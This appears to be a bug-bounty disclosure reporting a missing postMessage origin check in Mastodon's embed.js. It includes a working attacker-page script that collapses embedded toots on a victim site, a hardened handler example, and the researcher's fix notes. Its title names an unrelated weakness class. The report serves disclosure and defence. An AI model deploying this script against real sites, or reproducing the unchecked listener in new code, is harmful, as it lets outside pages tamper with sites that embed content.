Improper Restriction of Names for Files and Other Resources in mastodon/mastodon

Valid

Reported on

Jan 20th 2022


Description

The message event listener in embed.js does not check the origin of a postMessage before changing the height of the embedded toots. The vulnerable code accepts a postMessage from any origin on the browser window and feeds the attacker-supplied id and height straight into the resize logic, so an attacker can change the height of the toots and even make them disappear from the website by setting the height to 0.

Proof of Concept

STEP 1: The victim user posts toots on Mastodon and embeds them on his/her website using the following code:

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>Victim's website</title>
</head>
<body>

<br>
<iframe src="https://mas.to/@reo1212/107650549212219629/embed" class="mastodon-embed" style="max-width: 100%; border: 0" width="400" allowfullscreen="allowfullscreen"></iframe>
<script src="https://mas.to/embed.js" async="async"></script>

<br>
<iframe src="https://mas.to/@reo1212/107651044255197372/embed" class="mastodon-embed" style="max-width: 100%; border: 0" width="400" allowfullscreen="allowfullscreen"></iframe>

<br>

<iframe src="https://mas.to/@reo1212/107651044524139207/embed" class="mastodon-embed" style="max-width: 100%; border: 0" width="400" allowfullscreen="allowfullscreen"></iframe>

<br>
<iframe src="https://mas.to/@reo1212/107651044731807705/embed" class="mastodon-embed" style="max-width: 100%; border: 0" width="400" allowfullscreen="allowfullscreen"></iframe>

<br>

</body>
</html>

STEP 2: The attacker hosts the following code on his/her website.

NOTE: Change the values marked "SET THIS VALUE" to match the target website.

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title></title>
</head>
<body>

<p>
This exploit changes the height of all iframe tags with class "mastodon-embed" to "0", which makes the embedded toots disappear from the victim's website for as long as that browser window remains open.
</p>

<script>
    function exploit(){
        var target = 'http://localhost:8081/mastodon-iframes.html'; // SET THIS VALUE
        var NUMBER_OF_IFRAMES_IN_VICTIM_WEBSITE = 4; // SET THIS VALUE

        // Open the victim page in a new window so that a reference to it is kept.
        window.poc = window.open(target);

        // Keep re-sending the messages so that the embeds stay collapsed.
        setInterval(run, 2000);

        function run(){
            for(var id = 0; id < NUMBER_OF_IFRAMES_IN_VICTIM_WEBSITE; id++){
                var payload = JSON.parse(`{"type": "setHeight", "id": ${id}, "height": "0"}`);
                console.log(payload);

                // Target origin '*': the listener in embed.js never checks e.origin.
                window.poc.postMessage(payload, '*');
            }
        }
    }
</script>

<input type="button" onclick="exploit()" value="EXPLOIT">


</body>
</html>

STEP 3: Now exploit the vulnerability by clicking the EXPLOIT button on the attacker's website.

You will notice that the attacker's code continuously sets the height of the toots to 0, making them disappear from the victim's website.

Please check the video PoC: https://drive.google.com/file/d/1ZcihyzMuguCpxhwdMiwTSWifydNgBdrg/view

Impact

This exploit changes the height of all iframe tags with class mastodon-embed to 0, which makes the embedded toots disappear from the victim's website for as long as that browser window remains open. No toots will be visible even if the user refreshes the browser window.

Occurrences

Check the origin the message is coming from. Only allow trusted origins.
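An added example, not Mastodon's embed.js and not the patch referenced later on this page: a small model of the embed host's message handling, written as plain functions so it runs under Node without a browser. It places the unchecked handler shape the report describes beside a hardened one that goes a step further than a single origin check: it binds each message to the window and origin of the specific iframe it claims to resize, and rejects non-positive heights. The names registerEmbeds, handleMessageVulnerable, handleMessageHardened and demo, the 20000 px ceiling, and the sample origins are assumptions made for this example.

```javascript
// Constructed model of the embed host page. Each entry stands in for one
// <iframe class="mastodon-embed">; the origin is derived from its src.
function registerEmbeds(iframeSrcs) {
  return iframeSrcs.map((src, id) => ({
    id,
    origin: new URL(src).origin,    // e.g. "https://mas.to"
    contentWindow: { embedId: id }, // stand-in for the real iframe.contentWindow
    height: null,
  }));
}

// Vulnerable shape described in the report: data.id and data.height are
// trusted from any origin, so a foreign window can collapse every embed.
function handleMessageVulnerable(iframes, event) {
  const data = event.data || {};
  if (typeof data !== 'object' || data.type !== 'setHeight' || !iframes[data.id]) {
    return false;
  }
  iframes[data.id].height = data.height;
  return true;
}

// Hardened version (an assumption for this example, not the project's patch):
// a message is applied only if it comes from the content window of the iframe
// it names, from that iframe's own origin, and carries a sane height.
function handleMessageHardened(iframes, event) {
  const data = event.data || {};
  if (typeof data !== 'object' || data.type !== 'setHeight') return false;
  if (!Number.isInteger(data.id) || !iframes[data.id]) return false;

  const iframe = iframes[data.id];

  // 1. The sender must be the embed's own window. A top-level page that
  //    opened the host via window.open is never any iframe's contentWindow.
  if (event.source !== iframe.contentWindow) return false;

  // 2. The origin must match the origin of this iframe's src: "only allow
  //    trusted origins", bound per embed rather than to one hard-coded host.
  if (event.origin !== iframe.origin) return false;

  // 3. Height must be a positive finite number; "0" or a string is refused.
  const height = Number(data.height);
  if (!Number.isFinite(height) || height <= 0 || height > 20000) return false;

  iframe.height = height;
  return true;
}

// Constructed sample run: one attacker-style message, one legitimate resize.
function demo() {
  const srcs = [
    'https://mas.to/@example/1/embed',
    'https://mas.to/@example/2/embed',
  ];
  const vulnerable = registerEmbeds(srcs);
  const hardened = registerEmbeds(srcs);

  const attackerMsg = {
    origin: 'https://attacker.example',          // constructed origin
    source: { embedId: 'attacker-top-window' },  // not any embed's window
    data: { type: 'setHeight', id: 0, height: '0' },
  };
  const legitMsg = {
    origin: 'https://mas.to',
    source: hardened[1].contentWindow,
    data: { type: 'setHeight', id: 1, height: 480 },
  };

  return {
    vulnAccepted: handleMessageVulnerable(vulnerable, attackerMsg),
    vulnHeight: vulnerable[0].height,
    hardenedRejected: !handleMessageHardened(hardened, attackerMsg),
    hardenedAccepted: handleMessageHardened(hardened, legitMsg),
    hardenedHeight: hardened[1].height,
  };
}

console.log(demo());
```

Checking event.source against the iframe's contentWindow is the decisive test here, because the embed host and the Mastodon instance are different origins by design and a spoofed origin string alone would still be refused when it does not come from the embed's own window.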

We are processing your report and will contact the mastodon team within 24 hours. (a year ago)
Rohan Sharma modified the report (a year ago)
Rohan Sharma modified the report (a year ago)
Rohan Sharma submitted a (a year ago)

Rohan Sharma (Researcher), a year ago:


I have submitted the patch. It checks whether the origin of the incoming message is the same as the origin of the website, i.e. if window.location.origin !== e.origin, then we return and do not go forward.

The fix_check_origin_and_prototype branch also contains the fix for the other vulnerability submitted by me.

Eugen Rochko validated this vulnerability a year ago
Rohan Sharma has been awarded the disclosure bounty
The fix bounty is now up for grabs
Eugen Rochko marked this as fixed in 3.5.0 with commit 4d6d4b a year ago
Rohan Sharma has been awarded the fix bounty
This vulnerability will not receive a CVE
embed.js#L15-L23 has been validated